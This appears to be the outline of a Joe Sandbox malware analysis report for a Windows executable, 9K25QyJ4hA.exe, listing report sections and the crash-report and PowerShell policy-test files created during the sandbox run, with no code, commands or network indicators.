Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9K25QyJ4hA.exe_66ad3eb6a3ee976962d7f58fe0ffe93798e6ded_54246e41_2dc6c65a-1972-4697-8d1f-6f19cc1296ab\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9K25QyJ4hA.exe_66ad3eb6a3ee976962d7f58fe0ffe93798e6ded_54246e41_611a86e7-ff0c-4592-bab1-4a6d543a8865\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9K25QyJ4hA.exe_66ad3eb6a3ee976962d7f58fe0ffe93798e6ded_54246e41_6d3421bc-50a5-472e-9b38-757c47bbf5e0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6EBB.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70DF.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER710F.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B6B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D60.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D8.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DFD.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERACE.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fmcdpyx.fks.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34fsg2o5.pkh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ztftkii.ok4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5plm4ggv.23q.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fubq5all.5qi.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hg32n3ot.c3e.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prvsn3ld.r4p.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgk4anlm.2t5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upfkpv1b.3pf.ps1

Windows Analysis Report
9K25QyJ4hA.exe